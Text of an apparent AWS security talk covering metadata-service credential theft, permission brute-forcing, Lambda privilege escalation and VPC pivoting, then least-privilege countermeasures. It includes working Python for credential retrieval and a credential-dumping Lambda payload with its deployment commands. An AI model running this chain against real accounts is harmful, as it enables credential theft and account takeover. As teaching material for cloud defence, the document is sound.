credentials to consume the AWS API. Developers can provide these in multiple ways:
• Hard-coded into the application
• Environment variables
• Provided via an instance profile
a virtual HTTP server to each compute instance. This server (the instance metadata service, reachable at 169.254.169.254) stores information about the instance such as host name, IP address, and the instance profile credentials.
of IAM permissions that grant access to AWS services such as S3, DynamoDB or EC2. The principle of least privilege should be applied when configuring these permissions, but...
paths are used to gain access to the instance profile credentials. The first one returns the role name, which is required to build the second HTTP request. The second HTTP response yields a JSON document containing the credentials.
  http://169.254.169.254/
  /latest/meta-data/iam/security-credentials/
  /latest/meta-data/iam/security-credentials/{role-name}
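The two-step retrieval described above, as an added example (not code from the talk or from any of the tools it mentions). The HTTP transport is injectable: on a real EC2 instance call it without arguments and urllib talks to the metadata service; the `FAKE_IMDS` responses and the role name `WebApplicationRole` are constructed here so the logic runs offline. The optional `token` argument is the IMDSv2 session token; when IMDSv2 is enforced, both GETs must carry it, and an SSRF primitive that can only issue GET requests cannot obtain one because the token is fetched with a PUT.

```python
import json
import urllib.request

IMDS_BASE = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def urllib_get(url, headers=None):
    """Real transport: plain HTTP GET against the metadata service."""
    req = urllib.request.Request(url, headers=headers or {})
    with urllib.request.urlopen(req, timeout=2) as resp:
        return resp.read().decode()


def fetch_instance_profile_credentials(imds_get=None, token=None):
    """Return (role_name, credentials) using the two IMDS requests.

    imds_get(url, headers) -> response body; defaults to urllib_get.
    token is an optional IMDSv2 session token (obtained by a PUT to
    /latest/api/token); when set it is sent as X-aws-ec2-metadata-token.
    """
    get = imds_get or urllib_get
    headers = {"X-aws-ec2-metadata-token": token} if token else {}

    # Step 1: the listing returns the role name (one name per line).
    listing = get(IMDS_BASE + CREDS_PATH, headers).strip()
    if not listing:
        raise RuntimeError("instance has no instance profile attached")
    role_name = listing.splitlines()[0]

    # Step 2: the per-role document is JSON with temporary credentials.
    doc = json.loads(get(IMDS_BASE + CREDS_PATH + role_name, headers))
    creds = {k: doc[k] for k in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration")}
    return role_name, creds


# Constructed fake IMDS responses (values are placeholders, not real keys).
FAKE_IMDS = {
    IMDS_BASE + CREDS_PATH: "WebApplicationRole\n",
    IMDS_BASE + CREDS_PATH + "WebApplicationRole": json.dumps({
        "Code": "Success",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLEKEYID",
        "SecretAccessKey": "examplesecretkey",
        "Token": "exampletoken",
        "Expiration": "2030-01-01T00:00:00Z",
    }),
}


def fake_imds_get(url, headers=None):
    """Offline stand-in for urllib_get, served from FAKE_IMDS."""
    return FAKE_IMDS[url]


if __name__ == "__main__":
    role, creds = fetch_instance_profile_credentials(fake_imds_get)
    print(role, creds["AccessKeyId"], creds["Expiration"])
```

The returned values map directly onto the environment variables AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN, so an attacker can use them with the standard CLI or SDK from any host.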
ways to enumerate permissions for a given credential set:
• Use the IAM service to read the role's policies. In most cases this will fail because the role itself has no permission for the IAM API.
• Call each AWS API and analyze the response (brute-force). Only read-only actions (List*, Describe*, Get*) should be probed, since a successful mutating call changes the target account.
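The brute-force approach described above, as an added example in the style the talk attributes to enumerate-iam (this is not that tool's code). Each probe is a zero-argument callable; with boto3 you would pass something like `lambda: s3.list_buckets()`. Here the probes and the `ClientError` stand-in for `botocore.exceptions.ClientError` are constructed so the classifier runs offline.

```python
class ClientError(Exception):
    """Minimal stand-in for botocore.exceptions.ClientError (constructed)."""

    def __init__(self, code, message=""):
        super().__init__(f"{code}: {message}")
        self.response = {"Error": {"Code": code, "Message": message}}


# Error codes AWS services return when the caller lacks the permission.
DENIED_CODES = {
    "AccessDenied", "AccessDeniedException", "UnauthorizedOperation",
    "AuthorizationError", "UnauthorizedAccess",
}
# Error codes that mean the credentials themselves are unusable.
INVALID_CREDENTIAL_CODES = {"ExpiredToken", "InvalidClientTokenId",
                            "UnrecognizedClientException"}


def classify(call):
    """Run one probe and return 'allowed', 'denied', 'unknown' or 'invalid-credentials'."""
    try:
        call()
        return "allowed"
    except ClientError as exc:
        code = exc.response["Error"]["Code"]
        if code in DENIED_CODES:
            return "denied"
        if code in INVALID_CREDENTIAL_CODES:
            return "invalid-credentials"
        if code in ("Throttling", "ThrottlingException", "RequestLimitExceeded"):
            return "unknown"  # retry later; says nothing about permissions
        # Any other error (validation, missing resource) was raised after
        # authorization succeeded, which is how enumerate-iam reads it too.
        return "allowed"


def enumerate_permissions(probes):
    """probes: {'service:Action': callable}. Stops early on unusable credentials."""
    results = {}
    for action, call in probes.items():
        verdict = classify(call)
        results[action] = verdict
        if verdict == "invalid-credentials":
            break
    return results


def allowed_actions(results):
    return sorted(a for a, v in results.items() if v == "allowed")


def _raise(code):
    def call():
        raise ClientError(code)
    return call


# Constructed probes simulating a role with S3 and Lambda read access only.
SAMPLE_PROBES = {
    "iam:ListUsers": _raise("AccessDenied"),
    "ec2:DescribeInstances": _raise("UnauthorizedOperation"),
    "s3:ListBuckets": lambda: {"Buckets": []},
    "s3:GetBucketPolicy": _raise("NoSuchBucketPolicy"),  # authorized, then failed
    "lambda:ListFunctions": lambda: {"Functions": []},
    "sts:GetCallerIdentity": lambda: {"Arn": "arn:aws:sts::123456789012:assumed-role/WebApplicationRole/i-0"},
}

if __name__ == "__main__":
    for action, verdict in enumerate_permissions(SAMPLE_PROBES).items():
        print(f"{action:28} {verdict}")
```

Against a real account the probe dictionary is the long list of read-only calls, and `sts:GetCallerIdentity` is worth calling first: it always succeeds for valid credentials and tells you which role you are holding.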
], "Resource":"*" } ] } After permission enumeration the attacker knows that he's able to run all read-only API actions for S3 and Lambda. The most common scenario is that all API calls for S3 and Lambda are allowed. Even after permission enumeration there are many things the attacker doesn't know.
to a principal with full access to the AWS account. There are 28 well known privilege escalation techniques. Most of them are implemented in Pacu.
  {
    "Statement": [
      {
        "Effect": "Allow",
        "Action": ["*"],
        "Resource": "*"
      }
    ]
  }
method:
• Identify an existing IAM role with high privileges whose trust policy allows lambda.amazonaws.com to assume it
• Create a new Lambda function and associate the role (this requires lambda:CreateFunction and iam:PassRole on that role)
• Run the Lambda function (lambda:InvokeFunction)
The Lambda function will have access to the IAM role's credentials, just like EC2 instances have access to EC2 instance profile credentials.
detected when a new Lambda function is created and removed. Another alternative is to change the source code of an existing Lambda function (lambda:UpdateFunctionCode) to include our exploit.
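The payload for both variants (new function, or replacing the code of an existing one), as an added example that is not from the talk or from Pacu. The handler reads the role credentials from the environment variables the Lambda runtime sets for every invocation, and the helper packs it into the zip that `create-function` or `update-function-code` accept. The function and role names in the CLI comments are placeholders.

```python
import io
import os
import zipfile

# Source of the function that gets deployed. The runtime hands the attached
# role's temporary credentials to the code through these three variables.
HANDLER_SOURCE = '''\
import os

def handler(event, context):
    return {k: os.environ.get(k) for k in (
        "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")}
'''


def handler(event, context):
    """Same logic as HANDLER_SOURCE, kept as a real function so it can be run locally."""
    return {k: os.environ.get(k) for k in (
        "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")}


def build_deployment_package(source=HANDLER_SOURCE, filename="lambda_function.py"):
    """Return the bytes of a zip containing the handler, ready for --zip-file fileb://."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, source)
    return buf.getvalue()


def package_members(blob):
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    with open("payload.zip", "wb") as fh:
        fh.write(build_deployment_package())
    # Variant 1: new function with the high-privilege role (needs iam:PassRole):
    #   aws lambda create-function --function-name <name> --runtime python3.12 \
    #     --role arn:aws:iam::<account-id>:role/<HighPrivilegeRole> \
    #     --handler lambda_function.handler --zip-file fileb://payload.zip
    #   aws lambda invoke --function-name <name> out.json
    # Variant 2: reuse an existing function that already has the role:
    #   aws lambda update-function-code --function-name <existing> --zip-file fileb://payload.zip
    #   aws lambda invoke --function-name <existing> out.json
    print("wrote payload.zip with", package_members(build_deployment_package()))
```

Variant 2 is quieter because no function is created or deleted, but it overwrites production code; restoring the original code afterwards is part of the exercise, not an afterthought.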
allowed to call sts:AssumeRole. In the compromised AWS account there is an existing trust policy on the AdminRole which allows all principals in the SSO AWS account to assume the role.
to gain access to most resources in the AWS account. The accounts payable EC2 instance remains out of reach. The VPC is completely isolated from the Internet.
VPN connection using vpc-vpn-pivot depend on the technique being exploited. When no permissions are limiting the attack the default technique with AWS Client VPN is used
eventually be compromised by a malicious third party. SSRF is the most common attack vector, but others such as credentials hard-coded in applications, misconfigured AWS Cognito instances, phishing and developer workstation compromise also exist. The following countermeasures focus on reducing the blast radius and on threat detection.
IAM principals. Restricted permissions on the web server role WebApplicationRole would have prevented S3 bucket access and privilege escalation. Restricted permissions on MonitoringRole would have reduced the impact of the privilege escalation.
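What "restricted permissions" means for WebApplicationRole, as an added example that is not from the talk: a small IAM policy evaluator (action and resource wildcards, explicit Deny wins, default deny) run against a permissive policy of the kind the enumeration above reveals and against a least-privilege alternative. Both policies, the bucket name and the requests are constructed; the evaluator covers Action/Resource matching only, not conditions or principals.

```python
import re


def _wildcard_match(pattern, value):
    """IAM-style matching: '*' matches any run, '?' one character, case-insensitive."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, value, flags=re.IGNORECASE) is not None


def _as_list(x):
    return x if isinstance(x, list) else [x]


def is_allowed(policy, action, resource):
    """Evaluate one request against one identity policy document."""
    allowed = False
    for stmt in policy["Statement"]:
        action_hit = any(_wildcard_match(p, action) for p in _as_list(stmt["Action"]))
        resource_hit = any(_wildcard_match(p, resource) for p in _as_list(stmt["Resource"]))
        if not (action_hit and resource_hit):
            continue
        if stmt["Effect"] == "Deny":
            return False  # an explicit Deny overrides any Allow
        allowed = True
    return allowed


# Constructed: the kind of policy the enumeration step typically uncovers.
PERMISSIVE = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["s3:*", "lambda:*"], "Resource": "*"}],
}

# Constructed: what the web application actually needs (one bucket, objects only).
RESTRICTED = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject", "s3:PutObject"],
         "Resource": "arn:aws:s3:::app-uploads/*"},
    ],
}

# Requests an attacker holding the role's credentials would try.
REQUESTS = [
    ("s3:GetObject", "arn:aws:s3:::app-uploads/avatar.png"),
    ("s3:GetObject", "arn:aws:s3:::finance-backups/2024.sql"),
    ("s3:ListAllMyBuckets", "*"),
    ("lambda:UpdateFunctionCode", "arn:aws:lambda:us-east-1:123456789012:function:billing"),
]


def compare(policies=None, requests=REQUESTS):
    """Return {(action, resource): {policy_name: allowed}} for every request."""
    policies = policies or {"permissive": PERMISSIVE, "restricted": RESTRICTED}
    return {req: {name: is_allowed(pol, *req) for name, pol in policies.items()}
            for req in requests}


if __name__ == "__main__":
    for (action, resource), verdicts in compare().items():
        print(f"{action:26} {resource:50} {verdicts}")
```

The restricted policy still lets the application serve its own uploads, but the cross-bucket read and the Lambda code update that the privilege escalation relied on are denied, which is the blast-radius reduction the slide is asking for.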
any breach by using different AWS accounts to host your company workloads. The accounts payable application should have been deployed in a different AWS account within the same AWS Organization.
remember:
• It is possible to enumerate AWS credential permissions in a fast, safe and in-depth manner using enumerate-iam
• Cloud exploitation can be automated using pacu
• Private VPC networks can be breached using vpc-vpn-pivot
Follow @AndresRiancho on Twitter for more interesting cloud security content
• Cloud Security Assessment
• Intro to AWS Hacking training
• Application Penetration Test
• Source Code Review
Let me know, I can help you deliver secure web applications.